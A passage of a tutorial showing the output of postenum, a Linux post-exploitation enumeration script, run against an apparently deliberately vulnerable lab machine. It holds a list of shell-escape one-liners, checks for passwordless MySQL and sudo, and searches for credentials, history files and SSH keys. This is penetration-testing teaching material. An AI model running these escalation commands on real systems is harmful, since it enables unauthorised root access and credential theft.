root      3588  0.0  0.0      0     0 ?        S<   13:21   0:00 [kjournald]
root      3743  0.0  0.0      0     0 ?        S<   13:21   0:00 [rpciod/0]
root      3758  0.0  0.2   3648   564 ?        Ss   13:21   0:00 /usr/sbin/rpc.idmapd
root      3985  0.0  0.1   1716   488 tty4     Ss+  13:21   0:00 /sbin/getty 38400 tty4
root      3986  0.0  0.1   1716   492 tty5     Ss+  13:21   0:00 /sbin/getty 38400 tty5
root      3990  0.0  0.1   1716   488 tty2     Ss+  13:21   0:00 /sbin/getty 38400 tty2
root      3993  0.0  0.1   1716   492 tty3     Ss+  13:21   0:00 /sbin/getty 38400 tty3
root      3996  0.0  0.1   1716   488 tty6     Ss+  13:21   0:00 /sbin/getty 38400 tty6
root      4069  0.0  0.2   1872   540 ?        S    13:21   0:00 /bin/dd bs 1 if /proc/kmsg of /var/run/klogd/kmsg
root      4116  0.0  0.3   5312   996 ?        Ss   13:21   0:00 /usr/sbin/sshd
root      4193  0.0  0.5   2768  1304 ?        S    13:21   0:00 /bin/sh /usr/bin/mysqld_safe
root      4236  0.0  0.2   1700   556 ?        S    13:21   0:00 logger -p daemon.err -t mysqld_safe -i -t mysqld
root      4399  0.0  0.0      0     0 ?        S    13:21   0:00 [lockd]
root      4400  0.0  0.0      0     0 ?        S<   13:21   0:00 [nfsd4]
root      4401  0.0  0.0      0     0 ?        S    13:21   0:00 [nfsd]
root      4402  0.0  0.0      0     0 ?        S    13:21   0:00 [nfsd]
root      4403  0.0  0.0      0     0 ?        S    13:21   0:00 [nfsd]
root      4404  0.0  0.0      0     0 ?        S    13:21   0:00 [nfsd]
root      4405  0.0  0.0      0     0 ?        S    13:21   0:00 [nfsd]
root      4406  0.0  0.0      0     0 ?        S    13:21   0:00 [nfsd]
root      4407  0.0  0.0      0     0 ?        S    13:21   0:00 [nfsd]
root      4408  0.0  0.0      0     0 ?        S    13:21   0:00 [nfsd]
root      4412  0.0  0.1   2424   332 ?        Ss   13:21   0:00 /usr/sbin/rpc.mountd
root      4480  0.0  0.6   5412  1728 ?        Ss   13:21   0:00 /usr/lib/postfix/master
root      4487  0.0  0.4   5388  1204 ?        Ss   13:21   0:00 /usr/sbin/nmbd -D
root      4489  0.0  0.5   7724  1364 ?        Ss   13:21   0:00 /usr/sbin/smbd -D
root      4493  0.0  0.3   7724   812 ?        S    13:21   0:00 /usr/sbin/smbd -D
root      4508  0.0  0.3   2424   856 ?        Ss   13:21   0:00 /usr/sbin/xinetd -pidfile /var/run/xinetd.pid -stayalive -inetd_compat
root      4570  0.0  0.3   2104   896 ?        Ss   13:21   0:00 /usr/sbin/cron
root      4598  0.0  0.1   2052   348 ?        Ss   13:21   0:00 /usr/bin/jsvc -user tomcat55 -cp /usr/share/java/commons-daemon.jar:/usr/share/tomcat5.5/bin/bootstrap.jar -outfile SYSLOG -errfile SYSLOG -pidfile /var/run/tomcat5.5.pid -Djava.awt.headless=true -Xmx128M -Djava.endorsed.dirs=/usr/share/tomcat5.5/common/endorsed -Dcatalina.base=/var/lib/tomcat5.5 -Dcatalina.home=/usr/share/tomcat5.5 -Djava.io.tmpdir=/var/lib/tomcat5.5/temp -Djava.security.manager -Djava.security.policy=/var/lib/tomcat5.5/conf/catalina.policy org.apache.catalina.startup.Bootstrap
root      4599  0.0  0.1   2052   476 ?        S    13:21   0:00 /usr/bin/jsvc -user tomcat55 -cp /usr/share/java/commons-daemon.jar:/usr/share/tomcat5.5/bin/bootstrap.jar -outfile SYSLOG -errfile SYSLOG -pidfile /var/run/tomcat5.5.pid -Djava.awt.headless=true -Xmx128M -Djava.endorsed.dirs=/usr/share/tomcat5.5/common/endorsed -Dcatalina.base=/var/lib/tomcat5.5 -Dcatalina.home=/usr/share/tomcat5.5 -Djava.io.tmpdir=/var/lib/tomcat5.5/temp -Djava.security.manager -Djava.security.policy=/var/lib/tomcat5.5/conf/catalina.policy org.apache.catalina.startup.Bootstrap
root      4619  0.0  1.0  10596  2564 ?        Ss   13:21   0:00 /usr/sbin/apache2 -k start
root      4638  0.0 10.3  66344 26472 ?        Sl   13:21   0:00 /usr/bin/rmiregistry
root      4642  0.5  1.0  12208  2568 ?        Sl   13:21   0:08 ruby /usr/sbin/druby_timeserver.rb
root      4649  0.0  0.1   1716   488 tty1     Ss+  13:21   0:00 /sbin/getty 38400 tty1
root      4657  0.0  0.9   8540  2372 ?        S    13:21   0:01 /usr/bin/unrealircd
root      4659  0.3  4.7  14036 12016 ?        S    13:21   0:04 Xtightvnc :0 -desktop X -auth /root/.Xauthority -geometry 1024x768 -depth 24 -rfbwait 120000 -rfbauth /root/.vnc/passwd -rfbport 5900 -fp /usr/X11R6/lib/X11/fonts/Type1/,/usr/X11R6/lib/X11/fonts/Speedo/,/usr/X11R6/lib/X11/fonts/misc/,/usr/X11R6/lib/X11/fonts/75dpi/,/usr/X11R6/lib/X11/fonts/100dpi/,/usr/share/fonts/X11/misc/,/usr/share/fonts/X11/Type1/,/usr/share/fonts/X11/75dpi/,/usr/share/fonts/X11/100dpi/ -co /etc/X11/rgb
root      4664  0.0  0.4   2724  1188 ?        S    13:21   0:00 /bin/sh /root/.vnc/xstartup
root      4667  0.0  1.0   5936  2572 ?        S    13:21   0:00 xterm -geometry 80x24+10+10 -ls -title X Desktop
root      4670  0.3  1.9   8988  5000 ?        S    13:21   0:05 fluxbox
root      4704  0.0  0.6   2852  1544 pts/0    Ss+  13:22   0:00 -bash

[x] Is mysql running by root:
root      4193  0.0  0.5   2768  1304 ?        S    13:21   0:00 /bin/sh /usr/bin/mysqld_safe
mysql     4235  0.1  6.6 127560 17036 ?        Sl   13:21   0:02 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=mysql --pid-file=/var/run/mysqld/mysqld.pid --skip-external-locking --port=3306 --socket=/var/run/mysqld/mysqld.sock
root      4236  0.0  0.2   1700   556 ?        S    13:21   0:00 logger -p daemon.err -t mysqld_safe -i -t mysqld
www-data  4969  0.0  0.2   1784   540 pts/1    R+   13:44   0:00 grep mysql

It will attempt to locate any cron jobs in the common directories, as well as any for root. I will also give us the contents of the crontab, which is a list of regularly run commands used by the administrator. Next, we can see the running services, including those running as root, and a check if the MySQL process is present and running as root.

Phase 4: Database Credentials

The next option we'll cover will try to connect to MySQL and login — use the -t switch to do so:

target:/var/tmp$ ./postenum.sh -t

--------------------------------------------------------------------------

                 _
 _ __   ___  ___| |_ ___ _ __  _   _ _ __ ___
| '_ \ / _ \/ __| __/ _ \ '_ \| | | | '_ ' _ \
| |_) | (_) \__ \ ||  __/ | | | |_| | | | | | |  version : 1.0
| .__/ \___/|___/\__\___|_| |_|\__,_|_| |_| |_|
|_|

POST-ENUMERATION by mbahadou
--------------------------------------------------------------------------

 postenum - be the ROOT
 For help or reporting issues, visit https://github.com/mbahadou/postenum

[-] TRYING ACCESS
[+] - Check for some methods for extract creds and get access as root
[x] Connect to MYSQL as root and non-pass:
[/] We can connect to the local MYSQL service as 'root' and without a password!
mysqladmin  Ver 8.41 Distrib 5.0.51a, for debian-linux-gnu on i486
Copyright (C) 2000-2006 MySQL AB
This software comes with ABSOLUTELY NO WARRANTY. This is free software,
and you are welcome to modify and redistribute it under the GPL license

Server version          5.0.51a-3ubuntu5
Protocol version        10
Connection              Localhost via UNIX socket
UNIX socket             /var/run/mysqld/mysqld.sock
Uptime:                 25 min 31 sec

Threads: 2  Questions: 446  Slow queries: 0  Opens: 420  Flush tables: 1  Open tables: 64  Queries per second avg: 0.291

We can see that it is able to connect to the database as root with no password. It then gives us some version information, connection data, and the uptime.

Phase 5: Development Tools & Shell Escapes

The next option we will cover will look for common development tools on the system, which can often be abused and lead to privilege escalation. It will also try some common shell escapes if restricted shells are present. Use the -l option for this:

target:/var/tmp$ ./postenum.sh -l

--------------------------------------------------------------------------

                 _
 _ __   ___  ___| |_ ___ _ __  _   _ _ __ ___
| '_ \ / _ \/ __| __/ _ \ '_ \| | | | '_ ' _ \
| |_) | (_) \__ \ ||  __/ | | | |_| | | | | | |  version : 1.0
| .__/ \___/|___/\__\___|_| |_|\__,_|_| |_| |_|
|_|

POST-ENUMERATION by mbahadou
--------------------------------------------------------------------------

 postenum - be the ROOT
 For help or reporting issues, visit https://github.com/mbahadou/postenum

[-] DEVELOPMENT TOOLS and LANGUAGES
[+] - Check for development tools and languages are installed/supported
/usr/bin/python
/usr/bin/perl
/usr/bin/php
/usr/bin/gcc
/usr/bin/cc
/usr/bin/nmap

[+] - Check for how files can be uploaded
/usr/bin/ftp
/bin/netcat
/bin/nc
/usr/bin/wget
/usr/bin/curl

[+] - Shell escape
awk    =        awk 'BEGIN {system("/bin/sh")}'
perl   =        perl -e 'exec "/bin/sh";'
python =        python -c 'import pty;pty.spawn("/bin/sh")'
php    =        php -r 'system("/bin/sh");'
ruby   =        ruby -e 'exec "/bin/sh"'
less   =        !sh
more   =        !sh
man    =        !sh
nmap   =        --interactive
nmap   =        echo "os.execute('/bin/sh')" > /tmp/shell.nse
find   =        find / -exec /usr/bin/awk 'BEGIN {system("/bin/sh")}' \;
find   =        find / -exec sh -i \;
vi     =        :!sh or :shell or -c '!sh'
vim    =        :!sh or :shell or -c '!sh'
gdb      =      shell

[+] - List all Environment Variables
SERVER_SIGNATURE=<address>Apache/2.2.8 (Ubuntu) DAV/2 Server at 10.10.0.50 Port 80</address>

ORIG_PATH_TRANSLATED=/var/www/dvwa/vulnerabilities/exec/index.php
TERM=xterm
HTTP_USER_AGENT=Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
HTTP_HOST=10.10.0.50
SERVER_PORT=80
REDIRECT_HANDLER=php5-cgi
DOCUMENT_ROOT=/var/www/
SCRIPT_FILENAME=/var/www/dvwa/vulnerabilities/exec/index.php
REQUEST_URI=/dvwa/vulnerabilities/exec/
SCRIPT_NAME=/dvwa/vulnerabilities/exec/index.php
HTTP_CONNECTION=keep-alive
REMOTE_PORT=38016
PATH=/usr/local/bin:/usr/bin:/bin
ORIG_SCRIPT_FILENAME=/usr/lib/cgi-bin/php
SERVER_ADMIN=webmaster@localhost
PWD=/var/tmp
REDIRECT_STATUS=200
HTTP_ACCEPT_LANGUAGE=en-US,en;q=0.5
HTTP_REFERER=http://10.10.0.50/dvwa/vulnerabilities/exec/
HTTP_ACCEPT=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
HTTP_DNT=1
ORIG_SCRIPT_NAME=/cgi-bin/php
REMOTE_ADDR=10.10.0.1
SERVER_NAME=10.10.0.50
SHLVL=4
CONTENT_LENGTH=68
SERVER_SOFTWARE=Apache/2.2.8 (Ubuntu) DAV/2
QUERY_STRING=
SERVER_ADDR=10.10.0.50
GATEWAY_INTERFACE=CGI/1.1
HTTP_UPGRADE_INSECURE_REQUESTS=1
SERVER_PROTOCOL=HTTP/1.1
HTTP_ACCEPT_ENCODING=gzip, deflate
CONTENT_TYPE=application/x-www-form-urlencoded
REDIRECT_URL=/dvwa/vulnerabilities/exec/index.php
HTTP_COOKIE=security=low; PHPSESSID=c7e9261b3015fccc2d7518ea95244d5e
REQUEST_METHOD=POST
ORIG_PATH_INFO=/dvwa/vulnerabilities/exec/index.php
_=/usr/bin/printenv

[+] - List all available shells
# /etc/shells: valid login shells
/bin/csh
/bin/sh
/usr/bin/es
/usr/bin/ksh
/bin/ksh
/usr/bin/rc
/usr/bin/tcsh
/bin/tcsh
/usr/bin/esh
/bin/dash
/bin/bash
/bin/rbash
/usr/bin/screen

We can see that it finds some dev tools and languages, such as Python, PHP, and Nmap, among others. It also checks for tools that can be used to upload files, which could lead to further compromise. Then, it lists some shell escape commands, followed by environment variables and available shells on the system.

Phase 6: Software Versions

The next option we will look at will determine some version information from common software installed on the target. Use the -v switch to do so:

target:/var/tmp$ ./postenum.sh -v

--------------------------------------------------------------------------

                 _
 _ __   ___  ___| |_ ___ _ __  _   _ _ __ ___
| '_ \ / _ \/ __| __/ _ \ '_ \| | | | '_ ' _ \
| |_) | (_) \__ \ ||  __/ | | | |_| | | | | | |  version : 1.0
| .__/ \___/|___/\__\___|_| |_|\__,_|_| |_| |_|
|_|

POST-ENUMERATION by mbahadou
--------------------------------------------------------------------------

 postenum - be the ROOT
 For help or reporting issues, visit https://github.com/mbahadou/postenum

[-] SOFTWARES VERSION
[+] - Check apps and services version
[x] Sudo version (<= 1.8.20):
Sudo version 1.6.9p10

[x] MYSQL version:
mysql  Ver 14.12 Distrib 5.0.51a, for debian-linux-gnu (i486) using readline 5.2

[x] PostgreSQL version:
psql (PostgreSQL) 8.3.1
contains support for command-line editing

[x] Java version:
java version "1.5.0"
gij (GNU libgcj) version 4.2.4 (Ubuntu 4.2.4-1ubuntu3)

Copyright (C) 2007 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.  There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.

This gives us the software version numbers for Sudo, MySQL, PostgreSQL, and Java.

Phase 7: Interesting Files

The next option will attempt to locate any interesting files present on the system that could potentially be utilized for privilege escalation. Use the -c switch for this one:

target:/var/tmp$ ./postenum.sh -c

--------------------------------------------------------------------------

                 _
 _ __   ___  ___| |_ ___ _ __  _   _ _ __ ___
| '_ \ / _ \/ __| __/ _ \ '_ \| | | | '_ ' _ \
| |_) | (_) \__ \ ||  __/ | | | |_| | | | | | |  version : 1.0
| .__/ \___/|___/\__\___|_| |_|\__,_|_| |_| |_|
|_|

POST-ENUMERATION by mbahadou
--------------------------------------------------------------------------

 postenum - be the ROOT
 For help or reporting issues, visit https://github.com/mbahadou/postenum

[-] CONFIDENTIAL INFO and USER
[+] - Check list of users and super users
[x] Super user:
root:x:0:0:root:/root:/bin/bash
root

[x] Useful home users:
drwxr-xr-x 2 root     nogroup  4096 Mar 17  2010 /home/ftp
drwxr-xr-x 5 msfadmin msfadmin 4096 Jun 16  2018 /home/msfadmin
drwxr-xr-x 2 service  service  4096 Apr 16  2010 /home/service
drwxr-xr-x 3 user     user     4096 May  7  2010 /home/user

[x] Anything with /bin/bash /bin/sh /bin/dash:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
msfadmin:x:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash
postgres:x:108:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
user:x:1001:1001:just a user,111,,:/home/user:/bin/bash
service:x:1002:1002:,,,:/home/service:/bin/bash

[+] - Check /etc for config files (recursive 1 level)
[x] All *.conf files in /etc (recursive 1 level):
-rw-r--r-- 1 root root 552 Apr  9  2008 /etc/pam.conf
-rw-r--r-- 1 root root 899 Nov  6  2007 /etc/gssapi_mech.conf
-rw-r----- 1 root fuse 216 Feb 26  2008 /etc/fuse.conf
-rw-r--r-- 1 root root 2405 Mar 13  2008 /etc/sysctl.conf
-rw-r--r-- 1 root root 2689 Apr  4  2008 /etc/gai.conf
-rw-r--r-- 1 root root 4430 May 20  2012 /etc/vsftpd.conf
-rw-r--r-- 1 root root 2975 Mar 16  2010 /etc/adduser.conf
-rw-r--r-- 1 root root 2969 Mar 11  2008 /etc/debconf.conf
-rw-r--r-- 1 root root 92 Oct 20  2007 /etc/host.conf
-rw-r--r-- 1 root root 13144 Nov 16  2007 /etc/ltrace.conf
-rw-r--r-- 1 root root 423 May 20  2012 /etc/hesiod.conf
-rw-r--r-- 1 root root 34 Mar 16  2010 /etc/ld.so.conf
-rw-r--r-- 1 root root 599 Jun 17  2006 /etc/logrotate.conf
-rw-r--r-- 1 root root 354 Mar  5  2007 /etc/fdmount.conf
-rw-r--r-- 1 root root 529 May 20  2012 /etc/inetd.conf
-rw-r--r-- 1 root root 475 Oct 20  2007 /etc/nsswitch.conf
-rw-r--r-- 1 root root 214 Mar  8  2008 /etc/updatedb.conf
-rw-r--r-- 1 root root 41 Jul  5  2018 /etc/resolv.conf
-rw-r--r-- 1 root root 34 Feb 18  2008 /etc/e2fsck.conf
-rw-r--r-- 1 root root 4793 Mar 28  2008 /etc/hdparm.conf
-rw-r--r-- 1 root root 342 Mar 16  2010 /etc/popularity-contest.conf
-rw-r--r-- 1 root root 417 Mar 27  2008 /etc/mke2fs.conf
-rw-r--r-- 1 root root 15280 Apr 28  2010 /etc/devscripts.conf
-rw-r--r-- 1 root root 1614 Nov 23  2007 /etc/syslog.conf
-rw-r--r-- 1 root root 1260 Feb 21  2008 /etc/ucf.conf
-rw-r--r-- 1 root root 145 Dec  2  2008 /etc/idmapd.conf
-rw-r--r-- 1 root root 600 Oct 23  2007 /etc/deluser.conf
-rw-r--r-- 1 root root 240 Mar 16  2010 /etc/kernel-img.conf
-rw-r--r-- 1 root root 1878 May  4  2008 /etc/cowpoke.conf
-rw-r--r-- 1 root root 289 May 20  2012 /etc/xinetd.conf

[x] Sudo permissions
[/] We can run sudo without supplying a password:
usage: sudo -h | -K | -k | -L | -l | -V | -v
usage: sudo [-bEHPS] [-p prompt] [-u username|#uid] [VAR=value]
            {-i | -s | <command>}
usage: sudo -e [-S] [-p prompt] [-u username|#uid] file ...

[+] - Check sensitive files
-rw-r--r-- 1 root root 1581 May 13  2012 /etc/passwd
-rw-r----- 1 root shadow 1207 May 13  2012 /etc/shadow
-rw-r--r-- 1 root root 886 Apr 16  2010 /etc/group
-r--r----- 1 root root 470 Mar 16  2010 /etc/sudoers

[+] - Check if anything interesting in the mail directory
[x] Interesting mail in /var/mail:
-rw------- 1 msfadmin mail   0 Apr 28  2010 msfadmin
-rw------- 1 root     mail 722 May  7  2010 root

[x] Seems /var/mail/root exist - you can try to read it:
./postenum.sh: line 792: : command not found

[+] - Check if anything interesting in the home/root directories
[x] Check if /root is accessible:
[/] Root directory can be accessible
drwxr-xr-x 2 root root 4.0K May 20  2012 Desktop
-rwx------ 1 root root  401 May 20  2012 reset_logs.sh
-rw-r--r-- 1 root root  138 Jun 19 13:21 vnc.log

[x] Interesting /home/* directory:
drwxr-xr-x 2 root     nogroup  4.0K Mar 17  2010 ftp
drwxr-xr-x 5 msfadmin msfadmin 4.0K Jun  6  2018 msfadmin
drwxr-xr-x 2 service  service  4.0K Apr 16  2010 service
drwxr-xr-x 3 user     user     4.0K May  7  2010 user

[x] History files of /home/*/:
lrwxrwxrwx 1 root root 9 May 14  2012 /home/msfadmin/.bash_history -> /dev/null
-rw------- 1 root root 4.1K May 14  2012 /home/msfadmin/.mysql_history
-rw------- 1 user user 165 May  7  2010 /home/user/.bash_history

[x] History files of /root:
-rw-r--r-- 1 root root 173 Jun 18  2020 /root/.bash_history
-rw------- 1 root root 215 Jun 18 13:46 /root/.mysql_history

[+] - Check for plain text password
[x] ~/.bash_history - snippet below:
export TERM=xterm-256color
export SHELL=bash
stty rows 56 columns 213
ls
export TERM=xterm
ls
gfffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ls
ls -la
cd /tmp/

~/.nano_history file doesn't exist:
~/.mysql_history file doesn't exist
~/.php_history file doesn't exist

[+] - Check SSH Dir/Files
[x] Any private-key info - /home/*/.ssh/:
drwx------ 2 msfadmin msfadmin 4096 May 17  2010 /home/msfadmin/.ssh

drwx------ 2 user user 4096 May  7  2010 /home/user/.ssh

[x] Any private-key info - /root/.ssh/:
drwxr-xr-x 2 root root 4096 May 20  2012 /root/.ssh/
ls: cannot open directory /home/user/.ssh: Permission denied
 [READABLE]

Check if PermitRootLogin is on:
[/] Root is allowed to login via SSH
yes

[+] - Check password policy information and Umask value
[x] Password Policy:
PASS_MAX_DAYS   99999
PASS_MIN_DAYS   0
PASS_WARN_AGE   7

[x] Current umask value:
0022
u=rwx,g=rx,o=rx

[+] - Accessible .rhosts files
[x] Rhost config file(s):
-rwx------ 1 msfadmin msfadmin 4 May 20  2012 /home/msfadmin/.rhosts

First, it gives us a list of superusers and users, followed by anything from /etc/passwd that has a shell. Next, it looks for various configuration files, sensitive files, and what the sudo permissions are like. It then checks for mail and any other interesting files in the home and root directories. Lastly, it gives us the Bash history, password policy information, and any private keys for SSH.

Phase 8: Other Files & Sticky Bits

The next option we'll cover will give us SUID and SGID information related to the filesystem. These types of files can often be abused for privilege escalation when misconfigured. It will also check for hidden files or any other useful bits of information — use the -s switch to use this:

target:/var/tmp$ ./postenum.sh -s

--------------------------------------------------------------------------

                 _
 _ __   ___  ___| |_ ___ _ __  _   _ _ __ ___
| '_ \ / _ \/ __| __/ _ \ '_ \| | | | '_ ' _ \
| |_) | (_) \__ \ ||  __/ | | | |_| | | | | | |  version : 1.0
| .__/ \___/|___/\__\___|_| |_|\__,_|_| |_| |_|
|_|

POST-ENUMERATION by mbahadou
--------------------------------------------------------------------------

 postenum - be the ROOT
 For help or reporting issues, visit https://github.com/mbahadou/postenum

[-] FILE SYSTEM
[+] - Check if anything interesting in the www directory
[x] Any interesting file/folder in /var:
drwxr-xr-x  2 root     root     4.0K May  8  2010 backups
drwxr-xr-x 12 root     root     4.0K Apr 28  2010 cache
drwxr-xr-x 37 root     root     4.0K May 20  2012 lib
drwxrwsr-x  2 root     staff    4.0K Apr 15  2008 local
drwxrwxrwt  3 root     root       60 Jun 19 13:21 lock
drwxr-xr-x 14 root     root     4.0K Jun 19 13:21 log
drwxrwsr-x  2 root     mail     4.0K May  7  2010 mail
drwxr-xr-x  2 root     root     4.0K Mar 16  2010 opt
drwxr-xr-x 14 root     root      580 Jun 19 13:21 run
drwxr-xr-x  5 root     root     4.0K Apr 28  2010 spool
drwxrwxrwt  2 root     root     4.0K Jun 19 13:35 tmp
drwxr-xr-x 10 www-data www-data 4.0K Aug  8  2018 www

[x] Any interesting file/folder in /var/www:
drwxrwxrwt  3 root     root     4.0K Jun 19  2019 dav
drwxr-xr-x  8 www-data www-data 4.0K May 20  2012 dvwa
-rw-r--r--  1 www-data www-data  891 May 20  2012 index.php
drwxr-xr-x 10 www-data www-data 4.0K May 14  2012 mutillidae
drwxr-xr-x 11 www-data www-data 4.0K May 14  2012 phpMyAdmin
-rw-r--r--  1 www-data www-data   19 Apr 16  2010 phpinfo.php
drwxr-xr-x  3 www-data www-data 4.0K May 14  2012 test
drwxrwxr-x 22 www-data www-data  20K Apr 12  2018 tikiwiki
drwxrwxr-x 22 www-data www-data  20K Apr 16  2010 tikiwiki-old
drwxr-xr-x  7 www-data www-data 4.0K Apr 16  2010 twiki

ls: cannot access /var/www/html: No such file or directory

[x] Search on config.* and db.* files on /var:
-rw-r--r-- 1 root root 21424 May 20  2012 /var/cache/debconf/config.dat
-rw-r--r-- 1 root root 21308 May 20  2012 /var/cache/debconf/config.dat-old
-rw-r--r-- 1 www-data www-data 18684 Mar 16  2010 /var/www/dvwa/external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/Config.php
-rw-r--r-- 1 www-data www-data 2772 Mar 16  2010 /var/www/dvwa/external/phpids/0.6/lib/IDS/Config/Config.ini
-rw-r--r-- 1 www-data www-data 576 May 20  2012 /var/www/dvwa/config/config.inc.php
-rw-r--r-- 1 www-data www-data 576 Aug 26  2010 /var/www/dvwa/config/config.inc.php~
-rwxr-xr-x 1 www-data www-data 175 Apr  4  2018 /var/www/mutillidae/config.inc
-rwxr-xr-x 1 www-data www-data 20810 Apr 11  2011 /var/www/mutillidae/owasp-esapi-php/lib/htmlpurifier/HTMLPurifier/Config.php
-rw-r--r-- 1 www-data www-data 60881 Dec  9  2008 /var/www/phpMyAdmin/libraries/config.default.php
-rw-r--r-- 1 www-data www-data 4066 Dec  9  2008 /var/www/phpMyAdmin/libraries/auth/config.auth.lib.php
-rw-r--r-- 1 www-data www-data 35105 Dec  9  2008 /var/www/phpMyAdmin/libraries/Config.class.php
-rw-r--r-- 1 www-data www-data 2093 Dec  9  2008 /var/www/phpMyAdmin/config.sample.inc.php
-rw-r--r-- 1 www-data www-data 1584 Dec  9  2008 /var/www/phpMyAdmin/setup/frames/config.inc.php
-rw-r--r-- 1 www-data www-data 2719 Dec  9  2008 /var/www/phpMyAdmin/setup/config.php
-rw-rw-r-- 1 www-data www-data 1770 Aug 26  2004 /var/www/tikiwiki-old/lib/sheet/conf/config.inc.php
-rw-rw-r-- 1 www-data www-data 3383 Feb 21  2008 /var/www/tikiwiki-old/lib/Galaxia/config.tikiwiki.php
-rw-rw-r-- 1 www-data www-data 3383 Feb 21  2008 /var/www/tikiwiki-old/lib/Galaxia/config.php
-rw-rw-r-- 1 www-data www-data 3449 Feb 21  2008 /var/www/tikiwiki-old/lib/Galaxia/config.xaraya.php
-rw-rw-r-- 1 www-data www-data 9269 Nov 12  2005 /var/www/tikiwiki-old/lib/wiki3d/src/java/br/arca/morcego/Config.java
-rw-rw-r-- 1 www-data www-data 45 Mar 12  2005 /var/www/tikiwiki-old/lib/smarty/unit_test/config.php
-rw-rw-r-- 1 www-data www-data 258 Apr 24  2003 /var/www/tikiwiki-old/img/icons/config.gif
-rw-rw-r-- 1 www-data www-data 1770 Aug 26  2004 /var/www/tikiwiki/lib/sheet/conf/config.inc.php
-rw-rw-r-- 1 www-data www-data 3219 Jan 28  2006 /var/www/tikiwiki/lib/Galaxia/config.tikiwiki.php
-rw-rw-r-- 1 www-data www-data 3219 Jan 30  2006 /var/www/tikiwiki/lib/Galaxia/config.php
-rw-rw-r-- 1 www-data www-data 3259 Jan 28  2004 /var/www/tikiwiki/lib/Galaxia/config.xaraya.php
-rw-rw-r-- 1 www-data www-data 9269 Nov 12  2005 /var/www/tikiwiki/lib/wiki3d/src/java/br/arca/morcego/Config.java
-rw-rw-r-- 1 www-data www-data 45 Mar 12  2005 /var/www/tikiwiki/lib/smarty/unit_test/config.php
-rw-rw-r-- 1 www-data www-data 258 Apr 24  2003 /var/www/tikiwiki/img/icons/config.gif

[+] - Search for hidden files
[x] Hidden files:
-rw-r--r-- 1 service service 586 Apr 16  2010 /home/service/.profile
-rw-r--r-- 1 service service 2928 Apr 16  2010 /home/service/.bashrc
-rw-r--r-- 1 service service 220 Apr 16  2010 /home/service/.bash_logout
-rw-r--r-- 1 user user 586 Mar 31  2010 /home/user/.profile
-rw------- 1 user user 165 May  7  2010 /home/user/.bash_history
-rw-r--r-- 1 user user 2928 Mar 31  2010 /home/user/.bashrc
-rw-r--r-- 1 user user 220 Mar 31  2010 /home/user/.bash_logout
-rw------- 1 root root 4174 May 14  2012 /home/msfadmin/.mysql_history
-rw-r--r-- 1 msfadmin msfadmin 1598 Apr 16  2010 /home/msfadmin/vulnerable/twiki20030201/twiki-source/bin/.htaccess.txt
-rw-r--r-- 1 msfadmin msfadmin 9 Apr 16  2010 /home/msfadmin/vulnerable/twiki20030201/twiki-source/data/Sandbox/.mailnotify
-rw-r--r-- 1 msfadmin msfadmin 1436 Apr 16  2010 /home/msfadmin/vulnerable/twiki20030201/twiki-source/data/Sandbox/.changes
-rw-r--r-- 1 msfadmin msfadmin 210 Apr 16  2010 /home/msfadmin/vulnerable/twiki20030201/twiki-source/data/.htpasswd
-rw-r--r-- 1 msfadmin msfadmin 9 Apr 16  2010 /home/msfadmin/vulnerable/twiki20030201/twiki-source/data/Main/.mailnotify
-rw-r--r-- 1 msfadmin msfadmin 3657 Apr 16  2010 /home/msfadmin/vulnerable/twiki20030201/twiki-source/data/Main/.changes
-rw-r--r-- 1 msfadmin msfadmin 9 Apr 16  2010 /home/msfadmin/vulnerable/twiki20030201/twiki-source/data/Know/.mailnotify
-rw-r--r-- 1 msfadmin msfadmin 3489 Apr 16  2010 /home/msfadmin/vulnerable/twiki20030201/twiki-source/data/Know/.changes
-rw-r--r-- 1 msfadmin msfadmin 9 Apr 16  2010 /home/msfadmin/vulnerable/twiki20030201/twiki-source/data/TWiki/.mailnotify
-rw-r--r-- 1 msfadmin msfadmin 4189 Apr 16  2010 /home/msfadmin/vulnerable/twiki20030201/twiki-source/data/TWiki/.changes
-rw-r--r-- 1 msfadmin msfadmin 9 Apr 16  2010 /home/msfadmin/vulnerable/twiki20030201/twiki-source/data/_default/.mailnotify
-rw-r--r-- 1 msfadmin msfadmin 683 Apr 16  2010 /home/msfadmin/vulnerable/twiki20030201/twiki-source/data/_default/.changes
-rw-r--r-- 1 msfadmin msfadmin 9 Apr 16  2010 /home/msfadmin/vulnerable/twiki20030201/twiki-source/data/Trash/.mailnotify
-rw-r--r-- 1 msfadmin msfadmin 767 Apr 16  2010 /home/msfadmin/vulnerable/twiki20030201/twiki-source/data/Trash/.changes
-rwx------ 1 msfadmin msfadmin 4 May 20  2012 /home/msfadmin/.rhosts
-rw-r--r-- 1 msfadmin msfadmin 586 Mar 16  2010 /home/msfadmin/.profile
-rw-r--r-- 1 msfadmin msfadmin 0 May  7  2010 /home/msfadmin/.sudo_as_admin_successful
-rw------- 1 msfadmin msfadmin 0 Jun  6  2018 /home/msfadmin/.Xauthority
-rw-rw-rw- 1 root daemon 1 Aug  8  2018 /lib/tls/i686/cmov/.4tJrYgzxS.so
